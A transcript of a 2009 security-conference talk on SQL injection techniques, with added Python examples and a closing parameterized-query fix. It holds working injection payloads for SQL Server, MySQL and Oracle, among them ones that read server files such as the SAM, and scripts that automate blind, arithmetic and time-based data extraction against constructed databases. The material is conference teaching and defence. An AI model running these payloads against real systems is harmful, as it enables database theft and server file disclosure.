ShmooCON 2009 : Re-playing with (Blind) SQL Injection
Talk delivered by Chema Alonso & Jose Palazon "Palako" at ShmooCON 2009 in Washington about SQL Injection, Blind SQL Injection, Time-Based Blind SQL Injection, RFD (Remote File Downloading) and Serialized SQL Injection. http://www.slideshare.net/chemai64/timebased-blind-sql-injection-using-heavy-queries-34887073

Transcript

  • 1. (Re) Playing with (Blind) SQL Injection – José Palazón “Palako”, Mobile Security at Yahoo! – Chema Alonso, Informatica64, Microsoft MVP Enterprise Security
  • 2. Spain (…not only bulls…)
  • 3. SQL Injection attacks: a long time ago, in a galaxy far, far away… (Phrack 54, article 8: http://www.phrack.org/issues.html?id=8&issue=54)
  • 4. Agenda • Serialized SQL Injection – Demo: XML Extractor • Arithmetic SQL Injection – Divide by zero – Sums and subtractions – Type overflow – Demo • Remote File Downloading using Blind SQL Injection – SQL Server – MySQL – Oracle – Demo: RFD Tool • Time-Based Blind SQL Injection using heavy queries – Demo: Marathon Tool
  • 5. Serialized SQL Injection
  • 6. Serialized SQL Injection • Goal: merge a complex result set into a single displayable field. • XML serialization functions convert a whole result set into one XML string. • That makes it possible to download large amounts of data with single, simple injections instead of one request per row or per character.
  • 7. SQL Server • FOR XML: returns the result set as a single string holding an XML tree. • RAW: a mode (RAW, AUTO, EXPLICIT or PATH) is mandatory; RAW turns each row of the result set into a <row /> element with the columns as attributes. • BINARY BASE64: without this option the query fails on any binary column (images, password hashes), so it is specified explicitly. – union select '1','2','3',(select * from sysusers for xml raw, binary base64) • XMLSCHEMA: adds an inline schema, i.e. the whole table structure: data types, column names and other constraints. – Described by Dani Kachakil
  • 8. MySQL • No XML serialization built in (it needs a server-side extension), but GROUP_CONCAT (MySQL 4.1+) concatenates a whole column into one string. • The result is truncated to group_concat_max_len (1024 bytes by default), so raise it with SET SESSION group_concat_max_len when the injection allows it, or page through the data.
  • 9. Oracle • xmlforest, xmlelement, … (rows are merged with xmlagg) • No * support: the columns have to be named explicitly.
  • 10. Demo: Serialized SQL Injection
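Worked example, added here and not part of the talk: the serialization trick run end to end against a constructed SQLite database. SQLite's group_concat() stands in for MySQL's GROUP_CONCAT (SQL Server's FOR XML RAW serves the same purpose); the vulnerable endpoint, the table and column names and the sample data are all constructed for the example.

```python
import sqlite3

# Constructed victim database (not from the talk): a product catalogue plus a
# users table the attacker wants to pull out with a single request.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price TEXT);
        INSERT INTO products VALUES (1, 'widget', '9.99'), (2, 'gadget', '19.99');
        CREATE TABLE users(name TEXT, pw TEXT);
        INSERT INTO users VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99'),
                                 ('bob',   'e10adc3949ba59abbe56e057f20f883e');
    """)
    return db

def product_page(db, product_id):
    """Vulnerable endpoint: `product_id` is pasted into the SQL text, and all three
    selected columns are echoed to the page, so the query is UNION-able."""
    sql = f"SELECT id, name, price FROM products WHERE id = {product_id}"
    return db.execute(sql).fetchall()

def serialized_dump(db, table, columns, row_sep=";", col_sep=":"):
    """Serialized SQL injection: collapse every row of `table` into ONE string
    with group_concat(), smuggle it out in the page's third column and split
    it back into rows. One request instead of one per row (or per character)."""
    concat_expr = f" || '{col_sep}' || ".join(columns)
    payload = (f"0 UNION SELECT 1, 2, "
               f"(SELECT group_concat({concat_expr}, '{row_sep}') FROM {table})")
    rows = product_page(db, payload)
    blob = rows[0][2]          # id=0 matches nothing, so the only row is ours
    return [tuple(r.split(col_sep)) for r in blob.split(row_sep)]

def table_names(db):
    """Same trick against the catalogue (sqlite_master here; information_schema
    on MySQL, sysobjects or FOR XML ... XMLSCHEMA on SQL Server) to learn what
    to dump first."""
    payload = ("0 UNION SELECT 1, 2, (SELECT group_concat(name, ',') "
               "FROM sqlite_master WHERE type = 'table')")
    return product_page(db, payload)[0][2].split(",")

if __name__ == "__main__":
    db = build_db()
    print(table_names(db))                               # ['products', 'users']
    print(serialized_dump(db, "users", ["name", "pw"]))  # [('admin', '5f4d...'), ('bob', 'e10a...')]
```

The separators are the attacker's choice and must not occur in the data; with real engines the same applies to the 1024-byte GROUP_CONCAT default on MySQL, which silently truncates the serialized blob.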
  • 11. Arithmetic Blind SQL Injection
  • 12. Blind Attacks • The attacker injects code but cannot see the data directly. • The injection does, however, change the behaviour of the web application. • The attacker then looks for differences between the responses to true injections (1=1) and false injections (1=2) to extract data. – Blind SQL Injection – Blind XPath Injection – Blind LDAP Injection
  • 13. Blind SQL Injection Attacks • The attacker injects: – “true where clauses” – “false where clauses” – Ex: • Program.php?id=1 and 1=1 • Program.php?id=1 and 1=2 • The program returns no visible data from the database and no data in error messages. • The attacker never sees any data extracted from the database, only the application's behaviour.
  • 14. Blind SQL Injection Attacks • The attacker analyzes the response pages looking for differences between the “True-Answer Page” and the “False-Answer Page”: – Different hashes – Different HTML structure – Different patterns (keywords) – Different linear ASCII sums – “Different behaviour”, for example response time
  • 15. Blind SQL Injection Attacks • If any difference exists, the attacker can extract all the information in the database. How? Using “booleanization”: compare one character at a time against a counter and let the true/false page tell on which side of the counter it falls. • MySQL: – Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) » “True-Answer Page” or “False-Answer Page”? • MSSQL: – Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1)) from sysusers) • Oracle: – Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1)) from all_users where rownum<=1)
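Added worked example, not from the talk: the booleanization loop driven against a constructed SQLite-backed page. The hashes of the page for a known-true (1=1) and a known-false (1=2) injection are learned first (slide 14's "different hashes"), and each character is then recovered by binary search over its code point, so 7 requests per character replace a linear scan of up to 128. SQLite's unicode()/substr() play the role of ASCII()/Substring(); the news table, the users table and the password are constructed.

```python
import hashlib
import sqlite3

# Constructed victim (not from the talk): an article page keyed by a numeric id
# that never shows database errors or any column but the title.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT);
        INSERT INTO news VALUES (1, 'Welcome'), (2, 'Roadmap');
        CREATE TABLE users(name TEXT, pw TEXT);
        INSERT INTO users VALUES ('admin', 'S3cret!');
    """)
    return db

def render_page(db, article_id):
    """Vulnerable endpoint: `article_id` is concatenated into the WHERE clause.
    What the page shows depends only on whether the WHERE clause matched."""
    rows = db.execute(f"SELECT title FROM news WHERE id = {article_id}").fetchall()
    body = rows[0][0] if rows else "Article not found"
    return f"<html><body><h1>{body}</h1></body></html>"

class BlindOracle:
    """Turns page differences into a boolean. Learn the hash of the page for a
    condition known to be true (1=1) and one known to be false (1=2), then
    classify any injected condition by which of the two hashes its page has."""

    def __init__(self, fetch, base_id="1"):
        self.fetch, self.base_id, self.requests = fetch, base_id, 0
        self.true_hash = self._page_hash("1=1")
        self.false_hash = self._page_hash("1=2")
        if self.true_hash == self.false_hash:
            raise RuntimeError("true and false pages are identical: go time-based")

    def _page_hash(self, condition):
        self.requests += 1
        page = self.fetch(f"{self.base_id} AND ({condition})")
        return hashlib.sha256(page.encode()).hexdigest()

    def ask(self, condition):
        h = self._page_hash(condition)
        if h == self.true_hash:
            return True
        if h == self.false_hash:
            return False
        raise RuntimeError("unexpected page: dynamic content or an error page")

def extract(oracle, expr, max_len=64):
    """Booleanization: recover the string that SQL expression `expr` evaluates to,
    one character at a time, binary-searching the code point in [0, 127] with
    `unicode(substr(expr, pos, 1)) >= mid` (ASCII()/Substring() on other engines).
    The length probe first avoids reading past the end of the value."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle.ask(f"length({expr}) >= {pos}"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if oracle.ask(f"unicode(substr({expr}, {pos}, 1)) >= {mid}"):
                lo = mid
            else:
                hi = mid - 1
        out += chr(lo)
    return out

if __name__ == "__main__":
    db = build_db()
    oracle = BlindOracle(lambda param: render_page(db, param))
    print(extract(oracle, "(SELECT pw FROM users WHERE name = 'admin')"))  # S3cret!
    print(oracle.requests, "requests")                                     # 59 requests
```

If the page carries dynamic content (timestamps, ads, CSRF tokens) the hash comparison fails on every request; that is where the other differencers on slide 14 (HTML structure, keywords, ASCII sums) come in.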
  • 16. Arithmetic Blind SQL Injection • The query forces the parameter to be numeric: – SELECT field FROM table WHERE id=abs(param) • Boolean logic is built from arithmetic instead of from a where clause: – Divide by zero – Sums and subtractions – Type overflows
  • 17. Arithmetic Blind SQL Injection • Divide by zero (David Litchfield) – Id=A+(1/(ASCII(B)-C)) • A -> parameter value originally used in the query. • B -> value we are searching for, e.g. Substring(passwd,1,1) • C -> counter [0..255] – While ASCII(B)≠C the division simply yields a number; when ASCII(B)=C the database raises a divide-by-zero error, which shows up as a different page.
  • 18. Arithmetic Blind SQL Injection • Sums and subtractions – Id=A+ASCII(B)-C • A, B, C as above. – When ASCII(B)=C the response page for id=A+ASCII(B)-C is the same as for id=A. Scan C upward and stop at the first match: with abs() around the parameter a second, spurious match exists at C=ASCII(B)+2A.
  • 19. Arithmetic Blind SQL Injection • Value type overflow – Id=A+((C/ASCII(B))*(K)) • A, B, C as above. • K -> a value large enough that K*1 leaves the range of the type defined for A (e.g. if A is a 32-bit integer, K=2^32) – With integer division C/ASCII(B) is 0 while C<ASCII(B) and reaches 1 at C=ASCII(B); from that counter on K*(C/ASCII(B)) overflows the data type and the query errors, so the first C that errors is the character.
  • 20. Demo: • Divide by zero • Sums and subtractions • Integer overflow
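Added worked example, not code from the talk: the three arithmetic oracles from slides 17 to 19 run against a small model of a T-SQL engine. The model is not SQL Server; it only reproduces the behaviours the technique relies on (integer division that truncates, an error on division by zero, an error when an int result leaves the 32-bit range, NULL propagation past the end of the string). The article id, the `pw` column and its value are constructed.

```python
import ast
import operator

INT_MAX = 2**31 - 1     # T-SQL int; the model treats |v| > INT_MAX as an overflow
ARTICLE_ID = 7          # constructed: the value of `param` the page normally uses (A)
SECRET = "S3cret!"      # constructed: what ASCII(SUBSTRING(pw, pos, 1)) reads from (B)

class DbError(Exception):
    """Raised where the real engine would abort the query with an error."""

def victim_eval(expr):
    """Model of how the engine computes the injected numeric parameter.
    Supports + - * /, integer literals, ASCII(), SUBSTRING() and the column `pw`."""
    def walk(n):
        if isinstance(n, ast.Expression):
            return walk(n.body)
        if isinstance(n, ast.Constant):
            return n.value
        if isinstance(n, ast.Name) and n.id == "pw":
            return SECRET
        if isinstance(n, ast.Call):
            fn, args = n.func.id.upper(), [walk(a) for a in n.args]
            if fn == "ASCII":
                return ord(args[0]) if args[0] else None      # ASCII('') is NULL
            if fn == "SUBSTRING":
                return args[0][args[1] - 1:args[1] - 1 + args[2]]
            raise DbError(f"unknown function {fn}")
        if isinstance(n, ast.BinOp):
            a, b = walk(n.left), walk(n.right)
            if a is None or b is None:
                return None                                   # NULL propagates
            if isinstance(n.op, ast.Div):
                if b == 0:
                    raise DbError("Divide by zero error encountered.")
                v = abs(a) // abs(b) * (1 if (a < 0) == (b < 0) else -1)  # truncating int division
            else:
                v = {ast.Add: operator.add, ast.Sub: operator.sub,
                     ast.Mult: operator.mul}[type(n.op)](a, b)
            if abs(v) > INT_MAX:
                raise DbError("Arithmetic overflow error converting expression to data type int.")
            return v
        raise DbError("syntax error")
    return walk(ast.parse(expr, mode="eval"))

def page(param):
    """SELECT title FROM news WHERE id = abs(<param>): the article for id 7, a
    'not found' page otherwise, and a generic error page if the engine raised."""
    try:
        value = victim_eval(param)
    except DbError:
        return "500 error"
    return "article 7" if value is not None and abs(value) == ARTICLE_ID else "not found"

def via_divide_by_zero(pos):
    """id = A + (1/(ASCII(B) - C)): only C == ASCII(B) makes the engine throw."""
    for c in range(256):
        if page(f"{ARTICLE_ID}+(1/(ASCII(SUBSTRING(pw,{pos},1))-{c}))") == "500 error":
            return chr(c)

def via_sum_and_subtract(pos):
    """id = A + ASCII(B) - C: C == ASCII(B) reproduces the page for id = A.
    Scan upward and stop at the first hit: because of abs() in the query a
    second hit exists at C = ASCII(B) + 2A."""
    baseline = page(str(ARTICLE_ID))
    for c in range(256):
        if page(f"{ARTICLE_ID}+ASCII(SUBSTRING(pw,{pos},1))-{c}") == baseline:
            return chr(c)

def via_overflow(pos, k=INT_MAX):
    """id = A + ((C/ASCII(B)) * K): with integer division C/ASCII(B) is 0 while
    C < ASCII(B) and >= 1 from C == ASCII(B) on, so the first C that overflows
    is the character."""
    for c in range(256):
        if page(f"{ARTICLE_ID}+(({c}/ASCII(SUBSTRING(pw,{pos},1)))*{k})") == "500 error":
            return chr(c)

def extract(method, max_len=64):
    """Read positions 1.. until SUBSTRING runs past the end (NULL: no C matches)."""
    out = ""
    for pos in range(1, max_len + 1):
        ch = method(pos)
        if ch is None:
            break
        out += ch
    return out

if __name__ == "__main__":
    for method in (via_divide_by_zero, via_sum_and_subtract, via_overflow):
        print(method.__name__, extract(method))   # all three print S3cret!
```

All three variants cost up to 256 requests per character because they only answer "equal / not equal"; they are for the case where the parameter cannot carry a where clause at all, not a replacement for the binary search used with ordinary booleanization.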
  • 21. Remote File Downloading using Blind SQL Injection techniques
  • 22. Accessing Files • Two ways: – Load the file into a temp table and read it from there: • and i>(select top 1 ASCII(Substring(row,pos,1)) from temp_table) – Load the file inside the query itself: • and i>ASCII(Substring(load_file(file),pos,1)) • With the second way every request loads the whole file into memory again (sorry, engine :-)
  • 23. SQL Server 2K - External Data Sources • Only for known file types, accessed through drivers: txt, csv, xls, mdb, log – And 200>ASCII(SUBSTRING((SELECT * FROM OPENROWSET('MSDASQL', 'Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:\;', 'select top 1 * from c:\dir\target.txt')),1,1)) • Privileges – HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\DisallowAdhocAccess=0 – By default this key does not exist, so only users with the server admin role can use these functions. • NTFS permissions: the SQL Server service account must be able to read the file.
  • 24. SQL Server 2K – Bulk option • Access to any file – ; Create Table TempTable (row varchar(8000)) -- – ; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '\n', ROWTERMINATOR = '\n') -- – ; alter table TempTable add num int IDENTITY(1,1) NOT NULL -- – and (select COUNT(row) from TempTable) – and (select top 1 len(row) from TempTable where num = rownum) – and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1) – ; Drop Table TempTable -- • The three conditions are booleanized as on slide 15: first the row count, then each row's length, then each character (rownum is the attacker's row counter). • Privileges needed – Server role: bulkadmin – Database role: db_owner or db_ddladmin • NTFS permissions
  • 25. SQL Server 2k5 – 2k8 • OPENDATASOURCE and OPENROWSET supported • Bulk options improved: SINGLE_BLOB reads any file, binary included – AND 256 > ASCII(SUBSTRING((SELECT * FROM OPENROWSET(BULK 'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1)) -- • Permissions – bulkadmin server role – External data sources enabled (sp_configure / Surface Area Configuration tool for features)
  • 26. MySQL • LOAD_FILE – SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (the hex literal is 'c:\boot.ini'; it avoids quotes and backslash escaping in the payload) – Needs the FILE privilege; secure_file_priv (MySQL 5.1+) can restrict or disable it. • SQLbfTools: MySQLget command (illo and dab) • http://www.reversing.org/node/view/11 • Load Data infile – ; Create table C8DFC643 (datos varchar(4000)) – ; Load data infile 'c:\\boot.ini' into table C8DFC643 – ; alter table C8DFC643 add column num integer auto_increment unique key – and (select count(num) from C8DFC643) – and (select length(datos) from C8DFC643 where num = 1) – and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1) – ; Drop table C8DFC643 • The stacked (;) form only works when the client library allows several statements per query; LOAD_FILE needs just one.
  • 27. Oracle – Plain Text files • External Tables – ; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; -- – ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end; -- – Only plain text files; the rows are then read with the booleanization of slide 15. – Needs CREATE ANY DIRECTORY and CREATE TABLE, and the injection point has to sit inside a PL/SQL block for execute immediate to run.
  • 28. Oracle – DBMS_LOB (binary files: a BFILE in the same directory object is copied into a BLOB column, so datos must be a BLOB here, not the varchar2 of the external table above) ; execute immediate 'DECLARE l_bfile BFILE; l_blob BLOB; BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob; l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp''); DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly); DBMS_LOB.loadfromfile(l_blob, l_bfile, DBMS_LOB.getlength(l_bfile)); DBMS_LOB.fileclose(l_bfile); COMMIT; EXCEPTION WHEN OTHERS THEN ROLLBACK; END;'; end; --
  • 29. Demo RFD
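Added worked example, not from the talk: the attacker-side loop that reads a staged file back out once one of the loaders above has put it into a numbered temporary table. SQLite stands in for the real engine, and `stage_file()` merely plays the part of BULK INSERT / LOAD DATA INFILE / the ORACLE_LOADER external table, since SQLite has no file loader; the vulnerable lookup, the table and the sample file are constructed. Each integer (row count, line length, byte value) is read with one request per bit, the same cost as a binary search but without any state between requests.

```python
import sqlite3

# Constructed sample file (stands in for c:\boot.ini); not from the talk.
SAMPLE_FILE = ("[boot loader]\n"
               "timeout=30\n"
               "default=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS")

def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE items(id INTEGER, name TEXT);
        INSERT INTO items VALUES (1, 'first'), (2, 'second');
    """)
    return db

def stage_file(db, content):
    """Plays the part of the injected loader (BULK INSERT / LOAD DATA INFILE /
    external table): one file line per row plus an auto-increment `num` column
    so each line can be addressed, as the slides do with IDENTITY(1,1)."""
    db.execute("CREATE TABLE TempTable(num INTEGER PRIMARY KEY AUTOINCREMENT, row TEXT)")
    db.executemany("INSERT INTO TempTable(row) VALUES (?)",
                   [(line,) for line in content.split("\n")])

def lookup(db, item_id):
    """Vulnerable endpoint: numeric id concatenated into the query. The page
    only reveals whether a row came back."""
    return bool(db.execute(f"SELECT name FROM items WHERE id = {item_id}").fetchall())

def ask(db, condition):
    """Blind oracle: append `and (condition)` to a request that normally matches."""
    return lookup(db, f"1 AND ({condition})")

def read_int(db, expr, bits):
    """Read an integer-valued SQL expression with one request per bit:
    ((expr) >> b) & 1 = 1 holds exactly when bit b is set."""
    value = 0
    for b in range(bits):
        if ask(db, f"(({expr}) >> {b}) & 1 = 1"):
            value |= 1 << b
    return value

def download(db):
    """Slide 24's sequence: row count, then each row's length, then each byte."""
    n_rows = read_int(db, "(SELECT count(*) FROM TempTable)", 16)
    lines = []
    for n in range(1, n_rows + 1):
        length = read_int(db, f"(SELECT length(row) FROM TempTable WHERE num = {n})", 16)
        line = "".join(
            chr(read_int(db, f"(SELECT unicode(substr(row, {p}, 1)) "
                             f"FROM TempTable WHERE num = {n})", 8))
            for p in range(1, length + 1))
        lines.append(line)
    db.execute("DROP TABLE TempTable")       # the `; Drop Table TempTable --` cleanup
    return "\n".join(lines)

if __name__ == "__main__":
    db = build_db()
    stage_file(db, SAMPLE_FILE)
    print(download(db) == SAMPLE_FILE)       # True
```

Eight bits per byte is enough for the SINGLE_BLOB case as well (values 0 to 255); a text loader loses the line terminators, which is why the lines are re-joined with a newline at the end.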
  • 30. Time-based Blind SQL Injection using heavy queries
  • 31. Time-Based Blind SQL Injection • When there is no difference between the “True-Answer Page” and the “False-Answer Page”, time delays can be used. • The injection forces a delay in the response only when the injected condition is true. – Delay functions: • SQL Server: waitfor delay • Oracle: dbms_lock.sleep (needs execute permission on DBMS_LOCK) • MySQL: sleep() or benchmark() • PostgreSQL: pg_sleep – Ex: • ; if (exists(select * from users)) waitfor delay '0:0:5' --
  • 32. Exploit for Solar Empire Web Game
  • 33. Deep Blind SQL Injection • The length of the delay encodes the value itself instead of one bit per request, e.g. “a” -> 10 s delay, “b” -> 11 s delay, … • http://labs.portcullis.co.uk/application/deep-blind-
  • 34. Time-Based Blind SQL Injection • What about database engines without delay functions, e.g. MS Access, an Oracle connection without PL/SQL support, DB2, …? • Can Time-Based Blind SQL Injection still be exploited there?
  • 35. Yes, we can!
  • 36. “Where-Clause” execution order – SELECT whatever FROM whatever WHERE condition1 AND condition2 – Condition1 lasts 10 seconds – Condition2 lasts 100 seconds – Which condition should be executed first?
  • 37. The heavy condition first (Condition2 evaluated before Condition1):
      Condition2 (100 sec) | Condition1 (10 sec) | Condition2 AND Condition1 | Response time
      TRUE                 | FALSE               | FALSE                     | 110 sec
      TRUE                 | TRUE                | TRUE                      | 110 sec
      FALSE                | Not evaluated       | FALSE                     | 100 sec
  • 38. The light condition first (Condition1 evaluated before Condition2):
      Condition1 (10 sec) | Condition2 (100 sec) | Condition1 AND Condition2 | Response time
      TRUE                | FALSE                | FALSE                     | 110 sec
      TRUE                | TRUE                 | TRUE                      | 110 sec
      FALSE               | Not evaluated        | FALSE                     | 10 sec
  • 39. Time-Based Blind SQL Injection using Heavy Queries • The attacker can delay the “True-answer page” with a heavy query. • The heavy query is always true; the light condition is the one whose truth is being tested. As the tables show, the response time only depends on that light condition when it is evaluated first and short-circuits the heavy one (10 sec vs 110 sec); with the heavy one first both cases take 110 sec. • So it depends on how the database engine evaluates the where clauses in the query. • There are two types of database engines: – Databases without an optimization process (conditions evaluated in the order written, so the light condition must be injected first) – Databases with an optimization process (the engine chooses the order itself, typically cheapest first)
  • 40. Time-Based Blind SQL Injection using Heavy Queries • The attacker injects a heavy cross-join condition to delay the response page on true injections. • The cross-join must be heavier than the other condition: add self-joins until the delay clearly exceeds normal response-time jitter. • The attacker only has to know, or guess, the name of a table the current user can select from. • Example in MSSQL: – Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers AS sys2, sysusers AS sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers) – Here the heavy condition is written first; per slides 37–39 that order only leaks timing on an engine whose optimizer evaluates the cheap condition first. On an engine that evaluates left to right, write the light condition first.
  • 41. “Default” tables to construct a heavy query – Microsoft SQL Server • sysusers – Oracle • all_users – MySQL (version 5) • information_schema.columns – Microsoft Access • MSysAccessObjects (97 & 2000 versions) • MSysAccessStorage (2003 & 2007)
  • 42. “Default” tables to construct a heavy query • …or whatever you can guess – Clients – Customers – News – Logins – Users – Providers – …use your imagination…
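Added worked example, not from the talk and not engine code: a small model of the two evaluation orders from slides 37 and 38, a sizing rule for how many self-joins the heavy condition needs, and the payload builder that applies the ordering rule. The 10 s and 100 s costs come from the slides; the 13-row table, the 10 million rows per second throughput and the alias names are constructed assumptions.

```python
# Model of how AND-ed WHERE terms are evaluated (not engine code); the 10 s /
# 100 s figures are the ones on slides 37 and 38.
HEAVY_COST = 100   # the injected cross join: always TRUE, expensive
LIGHT_COST = 10    # the condition whose truth the attacker wants to learn

def response_time(terms, optimizer):
    """`terms` are (cost, truth) pairs in the order written in the WHERE clause.
    A naive engine evaluates them left to right; an optimizing engine runs the
    cheapest term first. Evaluation stops at the first FALSE term."""
    order = sorted(terms, key=lambda t: t[0]) if optimizer else list(terms)
    elapsed = 0
    for cost, truth in order:
        elapsed += cost
        if not truth:
            break
    return elapsed

def timing_table(optimizer, light_first):
    """(response time when the guess is TRUE, when it is FALSE) for one engine
    type and one injection order. The attack only works if the two differ."""
    def t(guess):
        light, heavy = (LIGHT_COST, guess), (HEAVY_COST, True)
        return response_time([light, heavy] if light_first else [heavy, light], optimizer)
    return t(True), t(False)

def join_width(table_rows, light_seconds, rows_per_second, margin=10):
    """Smallest number of self-joins k such that scanning table_rows**k rows takes
    at least `margin` times longer than the light condition, so that the delay is
    not lost in normal response-time noise (constructed sizing rule)."""
    k, rows = 1, table_rows
    while rows / rows_per_second < margin * light_seconds:
        k, rows = k + 1, rows * table_rows
    return k

def build_payload(condition, table="sysusers", k=8, heavy_first=False):
    """Slide 40's injection with a configurable join width. Light-first is the
    safe default: a naive engine then short-circuits the join on a FALSE guess,
    and an optimizing engine reorders anyway. heavy_first=True reproduces the
    order on slide 40, which relies on the optimizer to do that reordering."""
    aliases = ", ".join(f"{table} AS t{i}" for i in range(1, k + 1))
    heavy = f"(SELECT count(*) FROM {aliases}) > 1"
    return f"1 and {heavy} and {condition}" if heavy_first else f"1 and {condition} and {heavy}"

if __name__ == "__main__":
    for optimizer in (False, True):
        for light_first in (False, True):
            print(f"optimizer={optimizer} light_first={light_first}:",
                  timing_table(optimizer, light_first))   # only (False, False) gives (110, 110)
    print(join_width(13, 1.0, 1e7))   # 8 self-joins for a 13-row table at 10M rows/s
    print(build_payload("300 > (select top 1 ascii(substring(name,1,1)) from sysusers)"))
```

The sizing rule is what turns "the cross-join must be heavier" into a number: the row count of the guessed table and the server's throughput decide k, and the margin absorbs network jitter so a true and a false answer never overlap.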
  • 43. Ex 1: MS SQL Server Query lasts 14 seconds -> True-Answer
  • 44. Ex 1: MS SQL Server • Query lasts 1 second -> False-Answer
  • 45. Ex 2: Oracle Query Lasts 22 seconds –> True-Answer
  • 46. Ex 2: Oracle Query Lasts 1 second –> False-Answer
  • 47. Ex 3: Access 2000 Query Lasts 6 seconds –> True-Answer
  • 48. Ex 3: Access 2000 Query Lasts 1 second –> False-Answer
  • 49. Ex 4: Access 2007 Query Lasts 39 seconds –> True-Answer
  • 50. Ex 4: Access 2007 Query Lasts 1 second –> False-Answer
  • 51. Marathon Tool • Automates Time-Based Blind SQL Injection attacks using heavy queries against SQL Server, MySQL, MS Access and Oracle databases. • Schema extraction from known databases • Data extraction with heavy queries on any database engine (without schema) • Developed in .NET • Source code available
  • 52. Demo: Marathon Tool
  • 53. Prevention: don't forget Bobby Tables! Sanitize your queries: use parameterized queries (prepared statements) so that user input is never parsed as SQL, validate types, and allow-list anything that cannot be bound, such as table or column names.
  • 54. Questions? • Speakers: – Chema Alonso (chema@informatica64.com) – Palako (palako@lateatral.com) • Authors – Chema Alonso (chema@informatica64.com) – Alejandro Martín (amartin@informatica64.com) – Antonio Guzmán (aguzman@urjc.es) – Daniel Kachakil (dani@kachakil.org) – José Palazón “Palako” (palako@lateatral.com) – Marta Beltran (mberltran@urjc.es)
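Added example of the fix, not from the talk: the concatenated query every injection on this page abuses, beside its parameterized form, plus the allow-list needed for the one thing a bound parameter cannot carry, an identifier. SQLite and the news table are constructed.

```python
import sqlite3

# Constructed sample schema (not from the talk).
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT);
        INSERT INTO news VALUES (1, 'Welcome'), (2, 'Roadmap');
    """)
    return db

def find_vulnerable(db, article_id):
    """The pattern every injection on this page abuses: user input becomes SQL text."""
    return db.execute(f"SELECT title FROM news WHERE id = {article_id}").fetchall()

def find_fixed(db, article_id):
    """Validate the type, then bind the value. A bound parameter travels to the
    engine as data and is never parsed as SQL, so no escaping is involved."""
    try:
        article_id = int(article_id)
    except (TypeError, ValueError):
        return []
    return db.execute("SELECT title FROM news WHERE id = ?", (article_id,)).fetchall()

SORTABLE = {"id", "title"}   # identifiers cannot be bound: allow-list them instead

def list_sorted(db, column):
    """ORDER BY takes a column name, which placeholders cannot supply; only a
    value from the fixed set ever reaches the SQL text."""
    if column not in SORTABLE:
        raise ValueError(f"unsupported sort column: {column!r}")
    return db.execute(f"SELECT title FROM news ORDER BY {column}").fetchall()

if __name__ == "__main__":
    db = build_db()
    print(find_vulnerable(db, "1 OR 1=1"))   # both rows: the injection worked
    print(find_fixed(db, "1 OR 1=1"))        # []: rejected before it reaches SQL
    print(list_sorted(db, "title"))          # [('Roadmap',), ('Welcome',)]
```

Escaping quotes would not have helped the vulnerable version here: the parameter sits in a numeric context, so there is no quote to escape, which is exactly the situation the arithmetic and heavy-query injections on this page exploit.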
